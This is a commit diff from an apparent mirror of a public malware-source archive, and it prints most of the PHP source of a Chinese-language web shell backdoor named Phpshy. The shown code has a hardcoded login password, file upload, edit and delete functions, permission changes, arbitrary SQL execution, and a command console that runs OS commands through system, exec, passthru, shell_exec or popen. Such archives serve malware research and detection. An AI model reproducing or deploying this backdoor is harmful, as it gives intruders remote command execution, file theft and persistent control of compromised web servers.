13
1
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-20 22:18:28 +00:00

Rename Backdoor.PHP.WebShell.a to Backdoor.PHP.Phpshy.a.e

This commit is contained in:
vxunderground 2020-10-30 00:05:07 -05:00 committed by GitHub
parent bd0d0b19a2
commit a3948d3554
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -17,22 +17,22 @@ ob_start();
$mtime = explode(' ', microtime()); $mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0]; $starttime = $mtime[1] + $mtime[0];
/*===================== 程序配置 =====================*/ /*===================== 程序配置 =====================*/
// 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效 // 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效
$admin['check']="1"; $admin['check']="1";
// 验证方式,1为采用 Session 验证,其他数字则采用 Cookie验证 // 验证方式,1为采用 Session 验证,其他数字则采用 Cookie验证
// 默认采用 Session 验证,如果不能正常登陆,建议改为 Cookie验证 // 默认采用 Session 验证,如果不能正常登陆,建议改为 Cookie验证
$admin['checkmode']="1"; $admin['checkmode']="1";
// 如果需要密码验证,请修改登陆密码 // 如果需要密码验证,请修改登陆密码
$admin['pass']="hkuser"; $admin['pass']="hkuser";
/*===================== 配置结束 =====================*/ /*===================== 配置结束 =====================*/
// 允许程序在 register_globals = off 的环境下工作 // 允许程序在 register_globals = off 的环境下工作
if ( function_exists('ini_get') ) { if ( function_exists('ini_get') ) {
$onoff = ini_get('register_globals'); $onoff = ini_get('register_globals');
} else { } else {
@ -43,15 +43,15 @@ if ($onoff != 1) {
@extract($_GET, EXTR_SKIP); @extract($_GET, EXTR_SKIP);
} }
/*===================== 身份验证 =====================*/ /*===================== 身份验证 =====================*/
if($admin['check']=="1") { if($admin['check']=="1") {
if($admin['checkmode']=="1") { if($admin['checkmode']=="1") {
/*------- session 验证 -------*/ /*------- session 验证 -------*/
session_start(); session_start();
if ($_GET['action'] == "logout") { if ($_GET['action'] == "logout") {
session_destroy(); session_destroy();
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">"; echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动退出或单击这里退出程序界面&gt;&gt;&gt;</a></span>"; echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动退出或单击这里退出程序界面&gt;&gt;&gt;</a></span>";
exit; exit;
} }
if ($_POST['action'] == "login") { if ($_POST['action'] == "login") {
@ -59,7 +59,7 @@ if($admin['check']=="1") {
if ($adminpass==$admin['pass']) { if ($adminpass==$admin['pass']) {
$_SESSION['adminpass'] = $admin['pass']; $_SESSION['adminpass'] = $admin['pass'];
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">"; echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动跳转或单击这里进入程序界面&gt;&gt;&gt;</a></span>"; echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动跳转或单击这里进入程序界面&gt;&gt;&gt;</a></span>";
exit; exit;
} }
} }
@ -71,11 +71,11 @@ if($admin['check']=="1") {
loginpage(); loginpage();
} }
} else { } else {
/*------- cookie 验证 -------*/ /*------- cookie 验证 -------*/
if ($_GET['action'] == "logout") { if ($_GET['action'] == "logout") {
setcookie ("adminpass", ""); setcookie ("adminpass", "");
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">"; echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动退出或单击这里退出程序界面&gt;&gt;&gt;</a></span>"; echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动退出或单击这里退出程序界面&gt;&gt;&gt;</a></span>";
exit; exit;
} }
if ($_POST['action'] == "login") { if ($_POST['action'] == "login") {
@ -83,7 +83,7 @@ if($admin['check']=="1") {
if ($adminpass==$admin['pass']) { if ($adminpass==$admin['pass']) {
setcookie ("adminpass",$admin['pass'],time()+(1*24*3600)); setcookie ("adminpass",$admin['pass'],time()+(1*24*3600));
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">"; echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动跳转或单击这里进入程序界面&gt;&gt;&gt;</a></span>"; echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动跳转或单击这里进入程序界面&gt;&gt;&gt;</a></span>";
exit; exit;
} }
} }
@ -97,18 +97,18 @@ if($admin['check']=="1") {
} }
}//end check }//end check
/*===================== 验证结束 =====================*/ /*===================== 验证结束 =====================*/
// 判断 magic_quotes_gpc 状态 // 判断 magic_quotes_gpc 状态
if (get_magic_quotes_gpc()) { if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET); $_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST); $_POST = stripslashes_array($_POST);
} }
// 下载文件 // 下载文件
if (!empty($downfile)) { if (!empty($downfile)) {
if (!@file_exists($downfile)) { if (!@file_exists($downfile)) {
echo "<script>alert('你要下的文件不存在!')</script>"; echo "<script>alert('你要下的文件不存在!')</script>";
} else { } else {
$filename = basename($downfile); $filename = basename($downfile);
$filename_info = explode('.', $filename); $filename_info = explode('.', $filename);
@ -121,10 +121,10 @@ if (!empty($downfile)) {
} }
} }
// 程序目录(文件系统) // 程序目录(文件系统)
$pathname=str_replace('\\','/',dirname(__FILE__)); $pathname=str_replace('\\','/',dirname(__FILE__));
// 获取当前路径 // 获取当前路径
if (!isset($dir) or empty($dir)) { if (!isset($dir) or empty($dir)) {
$dir = "."; $dir = ".";
$nowpath = getPath($pathname, $dir); $nowpath = getPath($pathname, $dir);
@ -133,16 +133,16 @@ if (!isset($dir) or empty($dir)) {
$nowpath = getPath($pathname, $dir); $nowpath = getPath($pathname, $dir);
} }
// 判断读写情况 // 判断读写情况
if (dir_writeable($nowpath)) { if (dir_writeable($nowpath)) {
$dir_writeable = "可写"; $dir_writeable = "可写";
} else { } else {
$dir_writeable = "不可写"; $dir_writeable = "不可写";
} }
$dis_func = get_cfg_var("disable_functions"); $dis_func = get_cfg_var("disable_functions");
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\">PHPINFO</a>" : ""; $phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\">PHPINFO</a>" : "";
$shellmode=(!get_cfg_var("safe_mode")) ? " | <a href=\"?action=shell\">WebShell模式</a>" : ""; $shellmode=(!get_cfg_var("safe_mode")) ? " | <a href=\"?action=shell\">WebShell模式</a>" : "";
?> ?>
<html> <html>
<head> <head>
@ -182,155 +182,155 @@ a:hover{
<body style="table-layout:fixed; word-break:break-all"> <body style="table-layout:fixed; word-break:break-all">
<center> <center>
<p><strong><a href="?action=logout">注销会话</a> | <a href="?action=dir">返回根目录</a> | <a href="?action=phpenv">PHP环境变量</a><?=$phpinfo?><?=$shellmode?> | <a href="?action=sql">SQL查询</a> | <a href="http://www.4ngel.net" target="_blank" title="下载此程序">Version 1.5</a></strong></p> <p><strong><a href="?action=logout">注销会话</a> | <a href="?action=dir">返回根目录</a> | <a href="?action=phpenv">PHP环境变量</a><?=$phpinfo?><?=$shellmode?> | <a href="?action=sql">SQL查询</a> | <a href="http://www.4ngel.net" target="_blank" title="下载此程序">Version 1.5</a></strong></p>
<?php <?php
if ($_GET['action'] == "phpinfo") { if ($_GET['action'] == "phpinfo") {
$dis_func = get_cfg_var("disable_functions"); $dis_func = get_cfg_var("disable_functions");
echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看&lt;PHP环境变量&gt;"; echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看&lt;PHP环境变量&gt;";
exit; exit;
} }
?> ?>
<table width="760" border="0" cellpadding="0"> <table width="760" border="0" cellpadding="0">
<form action="" method="GET"> <form action="" method="GET">
<tr> <tr>
<td><p>程序路径:<?=$pathname?><br>当前目录(<?=$dir_writeable?>,<?=substr(base_convert(@fileperms($nowpath),10,8),-4);?>):<?=$nowpath?> <td><p>程序路径:<?=$pathname?><br>当前目录(<?=$dir_writeable?>,<?=substr(base_convert(@fileperms($nowpath),10,8),-4);?>):<?=$nowpath?>
<br>跳转目录: <br>跳转目录:
<input name="dir" type="text" class="INPUT"> <input name="dir" type="text" class="INPUT">
<input type="submit" class="INPUT" value="确定"> 〖支持绝对路径和相对路径〗 <input type="submit" class="INPUT" value="确定"> 〖支持绝对路径和相对路径〗
</p></td> </p></td>
</tr> </tr>
</form> </form>
<form action="?dir=<?=urlencode($dir)?>" method="POST" enctype="multipart/form-data"> <form action="?dir=<?=urlencode($dir)?>" method="POST" enctype="multipart/form-data">
<tr> <tr>
<td colspan="2">上传文件到当前目录: <td colspan="2">上传文件到当前目录:
<input name="uploadmyfile" type="file" class="INPUT"> <input type="submit" class="INPUT" value="确定"> <input name="uploadmyfile" type="file" class="INPUT"> <input type="submit" class="INPUT" value="确定">
<input name="action" type="hidden" value="uploadfile"><input type="hidden" name="uploaddir" value="<?=$dir?>"></td> <input name="action" type="hidden" value="uploadfile"><input type="hidden" name="uploaddir" value="<?=$dir?>"></td>
</tr> </tr>
</form> </form>
<form action="?action=editfile&dir=<?=urlencode($dir)?>" method="POST"> <form action="?action=editfile&dir=<?=urlencode($dir)?>" method="POST">
<tr> <tr>
<td colspan="2">新建文件在当前目录: <td colspan="2">新建文件在当前目录:
<input name="newfile" type="text" class="INPUT" value=""> <input name="newfile" type="text" class="INPUT" value="">
<input type="submit" class="INPUT" value="确定"> <input type="submit" class="INPUT" value="确定">
<input name="action" type="hidden" value="createfile"></td> <input name="action" type="hidden" value="createfile"></td>
</tr> </tr>
</form> </form>
<form action="" method="POST"> <form action="" method="POST">
<tr> <tr>
<td colspan="2">新建目录在当前目录: <td colspan="2">新建目录在当前目录:
<input name="newdirectory" type="text" class="INPUT" value=""> <input name="newdirectory" type="text" class="INPUT" value="">
<input type="submit" class="INPUT" value="确定"> <input type="submit" class="INPUT" value="确定">
<input name="action" type="hidden" value="createdirectory"></td> <input name="action" type="hidden" value="createdirectory"></td>
</tr> </tr>
</form> </form>
</table> </table>
<hr width="760" noshade> <hr width="760" noshade>
<?php <?php
/*===================== 执行操作 开始 =====================*/ /*===================== 执行操作 开始 =====================*/
echo "<p><b>\n"; echo "<p><b>\n";
// 删除文件 // 删除文件
if(@$delfile!="") { if(@$delfile!="") {
if(file_exists($delfile)) { if(file_exists($delfile)) {
@unlink($delfile); @unlink($delfile);
echo "".$delfile." 删除成功!"; echo "".$delfile." 删除成功!";
} else { } else {
echo "文件已不存在,删除失败!"; echo "文件已不存在,删除失败!";
} }
} }
// 删除目录 // 删除目录
elseif($_POST['action'] == "rmdir") { elseif($_POST['action'] == "rmdir") {
if($deldir!="") { if($deldir!="") {
$deldirs="$dir/$deldir"; $deldirs="$dir/$deldir";
if(!file_exists("$deldirs")) { if(!file_exists("$deldirs")) {
echo "目录已不存在!"; echo "目录已不存在!";
} else { } else {
deltree($deldirs); deltree($deldirs);
} }
} else { } else {
echo "删除失败!"; echo "删除失败!";
} }
} }
// 创建目录 // 创建目录
elseif($_POST['action'] == "createdirectory") { elseif($_POST['action'] == "createdirectory") {
if(!empty($newdirectory)) { if(!empty($newdirectory)) {
$mkdirs="$dir/$newdirectory"; $mkdirs="$dir/$newdirectory";
if(file_exists("$mkdirs")) { if(file_exists("$mkdirs")) {
echo "该目录已存在!"; echo "该目录已存在!";
} else { } else {
echo $msg=@mkdir("$mkdirs",0777) ? "创建目录成功!" : "创建失败!"; echo $msg=@mkdir("$mkdirs",0777) ? "创建目录成功!" : "创建失败!";
@chmod("$mkdirs",0777); @chmod("$mkdirs",0777);
} }
} }
} }
// 上传文件 // 上传文件
elseif($_POST['action'] == "uploadfile") { elseif($_POST['action'] == "uploadfile") {
echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadmyfile']['name']."") ? "上传成功!" : "上传失败!"; echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadmyfile']['name']."") ? "上传成功!" : "上传失败!";
} }
// 编辑文件 // 编辑文件
elseif($_POST['action'] == "doeditfile") { elseif($_POST['action'] == "doeditfile") {
$filename="$dir/$editfilename"; $filename="$dir/$editfilename";
@$fp=fopen("$filename","w"); @$fp=fopen("$filename","w");
echo $msg=@fwrite($fp,$_POST['filecontent']) ? "写入文件成功!" : "写入失败!"; echo $msg=@fwrite($fp,$_POST['filecontent']) ? "写入文件成功!" : "写入失败!";
@fclose($fp); @fclose($fp);
} }
// 编辑文件属性 // 编辑文件属性
elseif($_POST['action'] == "editfileperm") { elseif($_POST['action'] == "editfileperm") {
$fileperm=base_convert($_POST['fileperm'],8,10); $fileperm=base_convert($_POST['fileperm'],8,10);
echo $msg=@chmod($dir."/".$file,$fileperm) ? "属性修改成功!" : "修改失败!"; echo $msg=@chmod($dir."/".$file,$fileperm) ? "属性修改成功!" : "修改失败!";
echo " [".$file."] 修改后的属性为:".substr(base_convert(@fileperms($dir."/".$file),10,8),-4).""; echo " [".$file."] 修改后的属性为:".substr(base_convert(@fileperms($dir."/".$file),10,8),-4)."";
} }
// 连接MYSQL // 连接MYSQL
elseif($connect) { elseif($connect) {
if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) { if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
echo "数据库连接成功!"; echo "数据库连接成功!";
} else { } else {
echo mysql_error(); echo mysql_error();
} }
} }
// 执行SQL语句 // 执行SQL语句
elseif($doquery) { elseif($doquery) {
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败"); @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
@mysql_select_db($dbname) or die("选择数据库失败"); @mysql_select_db($dbname) or die("选择数据库失败");
$result = @mysql_query($_POST['sql_query']); $result = @mysql_query($_POST['sql_query']);
if ($result) { if ($result) {
echo "SQL语句成功执行"; echo "SQL语句成功执行";
}else{ }else{
echo "出错: ".mysql_error(); echo "出错: ".mysql_error();
} }
mysql_close(); mysql_close();
} }
// 查看PHP配置参数状况 // 查看PHP配置参数状况
elseif($_POST['action'] == "viewphpvar") { elseif($_POST['action'] == "viewphpvar") {
echo "配置参数 ".$_POST['phpvarname']." 检测结果: ".getphpcfg($_POST['phpvarname']).""; echo "配置参数 ".$_POST['phpvarname']." 检测结果: ".getphpcfg($_POST['phpvarname'])."";
} }
else { else {
echo "本程序由 Security Angel 安全组织 angel[BST] 独立开发,可在 <a href=\"http://www.4ngel.net\" target=\"_blank\">http://www.4ngel.net</a> 下载最新版本."; echo "本程序由 Security Angel 安全组织 angel[BST] 独立开发,可在 <a href=\"http://www.4ngel.net\" target=\"_blank\">http://www.4ngel.net</a> 下载最新版本.";
} }
echo "</b></p>\n"; echo "</b></p>\n";
/*===================== 执行操作 结束 =====================*/ /*===================== 执行操作 结束 =====================*/
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) { if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
?> ?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff"> <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr bgcolor="#cccccc"> <tr bgcolor="#cccccc">
<td align="center" nowrap width="40%"><b>文件</b></td> <td align="center" nowrap width="40%"><b>文件</b></td>
<td align="center" nowrap width="20%"><b>修改日期</b></td> <td align="center" nowrap width="20%"><b>修改日期</b></td>
<td align="center" nowrap width="12%"><b>大小</b></td> <td align="center" nowrap width="12%"><b>大小</b></td>
<td align="center" nowrap width="8%"><b>属性</b></td> <td align="center" nowrap width="8%"><b>属性</b></td>
<td align="center" nowrap width="20%"><b>操作</b></td> <td align="center" nowrap width="20%"><b>操作</b></td>
</tr> </tr>
<?php <?php
// 目录列表 // 目录列表
$dirs=@opendir($dir); $dirs=@opendir($dir);
while ($file=@readdir($dirs)) { while ($file=@readdir($dirs)) {
$b="$dir/$file"; $b="$dir/$file";
@ -344,12 +344,12 @@ while ($file=@readdir($dirs)) {
echo " <td align=\"center\" nowrap valign=\"top\">$lastsave</td>\n"; echo " <td align=\"center\" nowrap valign=\"top\">$lastsave</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\">&lt;dir&gt;</td>\n"; echo " <td align=\"center\" nowrap valign=\"top\">&lt;dir&gt;</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n"; echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=deldir&dir=".urlencode($dir)."&deldir=".urlencode($file)."\">删除</a></td>\n"; echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=deldir&dir=".urlencode($dir)."&deldir=".urlencode($file)."\">删除</a></td>\n";
echo "</tr>\n"; echo "</tr>\n";
} else { } else {
if($file=="..") { if($file=="..") {
echo "<tr class=".getrowbg().">\n"; echo "<tr class=".getrowbg().">\n";
echo " <td nowrap colspan=\"5\" style=\"padding-left: 5px;\"><a href=\"?dir=".$dir."/".$file."\">返回上级目录</a></td>\n"; echo " <td nowrap colspan=\"5\" style=\"padding-left: 5px;\"><a href=\"?dir=".$dir."/".$file."\">返回上级目录</a></td>\n";
echo "</tr>\n"; echo "</tr>\n";
} }
} }
@ -358,7 +358,7 @@ while ($file=@readdir($dirs)) {
}//while }//while
@closedir($dirs); @closedir($dirs);
// 文件列表 // 文件列表
$dirs=@opendir($dir); $dirs=@opendir($dir);
while ($file=@readdir($dirs)) { while ($file=@readdir($dirs)) {
$b="$dir/$file"; $b="$dir/$file";
@ -374,7 +374,7 @@ while ($file=@readdir($dirs)) {
echo " <td align=\"center\" nowrap valign=\"top\">$lastsave</td>\n"; echo " <td align=\"center\" nowrap valign=\"top\">$lastsave</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\">$size KB</td>\n"; echo " <td align=\"center\" nowrap valign=\"top\">$size KB</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n"; echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlencode($dir)."/".urlencode($file)."\">下载</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">编辑</a> | <a href=\"?dir=".urlencode($dir)."&delfile=".urlencode($dir)."/".urlencode($file)."\">删除</a></td>\n"; echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlencode($dir)."/".urlencode($file)."\">下载</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">编辑</a> | <a href=\"?dir=".urlencode($dir)."&delfile=".urlencode($dir)."/".urlencode($file)."\">删除</a></td>\n";
echo "</tr>\n"; echo "</tr>\n";
$file_i++; $file_i++;
} }
@ -382,7 +382,7 @@ while ($file=@readdir($dirs)) {
@closedir($dirs); @closedir($dirs);
echo "<tr class=".getrowbg().">\n"; echo "<tr class=".getrowbg().">\n";
echo " <td nowrap colspan=\"5\" align=\"right\">".$dir_i." 个目录<br>".$file_i." 个文件</td>\n"; echo " <td nowrap colspan=\"5\" align=\"right\">".$dir_i." 个目录<br>".$file_i." 个文件</td>\n";
echo "</tr>\n"; echo "</tr>\n";
?> ?>
</table> </table>
@ -404,20 +404,20 @@ elseif ($_GET['action'] == "editfile") {
?> ?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff"> <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt"> <tr class="firstalt">
<td align="center">新建/编辑文件 [<a href="?dir=<?=urlencode($dir)?>">返回</a>]</td> <td align="center">新建/编辑文件 [<a href="?dir=<?=urlencode($dir)?>">返回</a>]</td>
</tr> </tr>
<form action="?dir=<?=urlencode($dir)?>" method="POST"> <form action="?dir=<?=urlencode($dir)?>" method="POST">
<tr class="secondalt"> <tr class="secondalt">
<td align="center">当前文件:<input class="input" type="text" name="editfilename" size="30" <td align="center">当前文件:<input class="input" type="text" name="editfilename" size="30"
value="<?=$editfile?>"> 输入新文件名则建立新文件</td> value="<?=$editfile?>"> 输入新文件名则建立新文件</td>
</tr> </tr>
<tr class="firstalt"> <tr class="firstalt">
<td align="center"><textarea name="filecontent" cols="100" rows="20"><?=$contents?></textarea></td> <td align="center"><textarea name="filecontent" cols="100" rows="20"><?=$contents?></textarea></td>
</tr> </tr>
<tr class="secondalt"> <tr class="secondalt">
<td align="center"><input type="submit" value="确定写入" class="input"> <td align="center"><input type="submit" value="确定写入" class="input">
<input name="action" type="hidden" value="doeditfile"> <input name="action" type="hidden" value="doeditfile">
<input type="reset" value="重置" class="input"></td> <input type="reset" value="重置" class="input"></td>
</tr> </tr>
</form> </form>
</table> </table>
@ -433,19 +433,19 @@ elseif ($_GET['action'] == "shell") {
</tr> </tr>
<form action="?action=shell&dir=<?=urlencode($dir)?>" method="POST"> <form action="?action=shell&dir=<?=urlencode($dir)?>" method="POST">
<tr class="secondalt"> <tr class="secondalt">
<td align="center">提示:如果输出结果不完全,建议把输出结果写入文件.这样可以得到全部内容.</td> <td align="center">提示:如果输出结果不完全,建议把输出结果写入文件.这样可以得到全部内容.</td>
</tr> </tr>
<tr class="firstalt"> <tr class="firstalt">
<td align="center"> <td align="center">
选择执行函数: 选择执行函数:
<select name="execfunc" class="input"> <select name="execfunc" class="input">
<option value="system" <? if ($execfunc=="system") { echo "selected"; } ?>>system</option> <option value="system" <? if ($execfunc=="system") { echo "selected"; } ?>>system</option>
<option value="passthru" <? if ($execfunc=="passthru") { echo "selected"; } ?>>passthru</option> <option value="passthru" <? if ($execfunc=="passthru") { echo "selected"; } ?>>passthru</option>
<option value="exec" <? if ($execfunc=="exec") { echo "selected"; } ?>>exec</option> <option value="exec" <? if ($execfunc=="exec") { echo "selected"; } ?>>exec</option>
<option value="shell_exec" <? if ($execfunc=="shell_exec") { echo "selected"; } ?>>shell_exec</option> <option value="shell_exec" <? if ($execfunc=="shell_exec") { echo "selected"; } ?>>shell_exec</option>
<option value="popen" <? if ($execfunc=="popen") { echo "selected"; } ?>>popen</option> <option value="popen" <? if ($execfunc=="popen") { echo "selected"; } ?>>popen</option>
</select>  </select> 
输入命令: 输入命令:
<input type="text" name="command" size="60" value="<?=$_POST['command']?>" class="input"> <input type="text" name="command" size="60" value="<?=$_POST['command']?>" class="input">
<input type="submit" value="execute" class="input"></td> <input type="submit" value="execute" class="input"></td>
</tr> </tr>
@ -478,7 +478,7 @@ elseif ($_GET['action'] == "shell") {
<?php <?php
} else { } else {
?> ?>
<p><b>Safe_Mode 已打开, 无法执行系统命令.</b></p> <p><b>Safe_Mode 已打开, 无法执行系统命令.</b></p>
<?php <?php
} }
}//end shell }//end shell
@ -488,10 +488,10 @@ elseif ($_GET['action'] == "deldir") {
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff"> <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<form action="?dir=<?=urlencode($dir)?>" method="POST"> <form action="?dir=<?=urlencode($dir)?>" method="POST">
<tr class="firstalt"> <tr class="firstalt">
<td align="center">删除 <input name="deldir" type="text" value="<?=$deldir?>" class="input" readonly> 目录</td> <td align="center">删除 <input name="deldir" type="text" value="<?=$deldir?>" class="input" readonly> 目录</td>
</tr> </tr>
<tr class="secondalt"> <tr class="secondalt">
<td align="center">注意:如果该目录非空,此次操作将会删除该目录下的所有文件.您确定吗?</td> <td align="center">注意:如果该目录非空,此次操作将会删除该目录下的所有文件.您确定吗?</td>
</tr> </tr>
<tr class="firstalt"> <tr class="firstalt">
<td align="center"> <td align="center">
@ -508,11 +508,11 @@ elseif ($_GET['action'] == "fileperm") {
?> ?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff"> <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt"> <tr class="firstalt">
<td align="center">修改文件属性 [<a href="?dir=<?=urlencode($dir)?>">返回</a>]</td> <td align="center">修改文件属性 [<a href="?dir=<?=urlencode($dir)?>">返回</a>]</td>
</tr> </tr>
<form action="?dir=<?=urlencode($dir)?>" method="POST"> <form action="?dir=<?=urlencode($dir)?>" method="POST">
<tr class="secondalt"> <tr class="secondalt">
<td align="center"><input name="file" type="text" value="<?=$file?>" class="input" readonly> 的属性为: <td align="center"><input name="file" type="text" value="<?=$file?>" class="input" readonly> 的属性为:
<input type="text" name="fileperm" size="20" value="<?=substr(base_convert(fileperms($dir."/".$file),10,8),-4)?>" class="input"> <input type="text" name="fileperm" size="20" value="<?=substr(base_convert(fileperms($dir."/".$file),10,8),-4)?>" class="input">
<input name="dir" type="hidden" value="<?=urlencode($dir)?>"> <input name="dir" type="hidden" value="<?=urlencode($dir)?>">
<input name="action" type="hidden" value="editfileperm"> <input name="action" type="hidden" value="editfileperm">
@ -531,7 +531,7 @@ elseif ($_GET['action'] == "sql") {
?> ?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff"> <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt"> <tr class="firstalt">
<td align="center">执行 SQL 语句</td> <td align="center">执行 SQL 语句</td>
</tr> </tr>
<form action="?action=sql" method="POST"> <form action="?action=sql" method="POST">
<tr class="secondalt"> <tr class="secondalt">
@ -543,13 +543,13 @@ elseif ($_GET['action'] == "sql") {
<input name="dbpassword" type="text" class="INPUT" size="15" value="<?=$dbpassword?>"> <input name="dbpassword" type="text" class="INPUT" size="15" value="<?=$dbpassword?>">
DB: DB:
<input name="dbname" type="text" class="INPUT" size="15" value="<?=$dbname?>"> <input name="dbname" type="text" class="INPUT" size="15" value="<?=$dbname?>">
<input name="connect" type="submit" class="INPUT" value="连接"></td> <input name="connect" type="submit" class="INPUT" value="连接"></td>
</tr> </tr>
<tr class="firstalt"> <tr class="firstalt">
<td align="center"><textarea name="sql_query" cols="85" rows="10"></textarea></td> <td align="center"><textarea name="sql_query" cols="85" rows="10"></textarea></td>
</tr> </tr>
<tr class="secondalt"> <tr class="secondalt">
<td align="center"><input type="submit" name="doquery" value="执行" class="input"></td> <td align="center"><input type="submit" name="doquery" value="执行" class="input"></td>
</tr> </tr>
</form> </form>
</table> </table>
@ -557,7 +557,7 @@ elseif ($_GET['action'] == "sql") {
}//end sql query }//end sql query
elseif ($_GET['action'] == "phpenv") { elseif ($_GET['action'] == "phpenv") {
$upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传"; $upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
$adminmail=(isset($_SERVER["SERVER_ADMIN"])) ? "<a href=\"mailto:".$_SERVER["SERVER_ADMIN"]."\">".$_SERVER["SERVER_ADMIN"]."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>"; $adminmail=(isset($_SERVER["SERVER_ADMIN"])) ? "<a href=\"mailto:".$_SERVER["SERVER_ADMIN"]."\">".$_SERVER["SERVER_ADMIN"]."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
@ -571,66 +571,66 @@ elseif ($_GET['action'] == "phpenv") {
$phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No"; $phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
$info[0] = array("服务器时间",date("Y年m月d日 h:i:s",time())); $info[0] = array("服务器时间",date("Y年m月d日 h:i:s",time()));
$info[1] = array("服务器域名","<a href=\"http://$_SERVER[SERVER_NAME]\" target=\"_blank\">$_SERVER[SERVER_NAME]</a>"); $info[1] = array("服务器域名","<a href=\"http://$_SERVER[SERVER_NAME]\" target=\"_blank\">$_SERVER[SERVER_NAME]</a>");
$info[2] = array("服务器IP地址",gethostbyname($_SERVER["SERVER_NAME"])); $info[2] = array("服务器IP地址",gethostbyname($_SERVER["SERVER_NAME"]));
$info[3] = array("服务器操作系统",PHP_OS); $info[3] = array("服务器操作系统",PHP_OS);
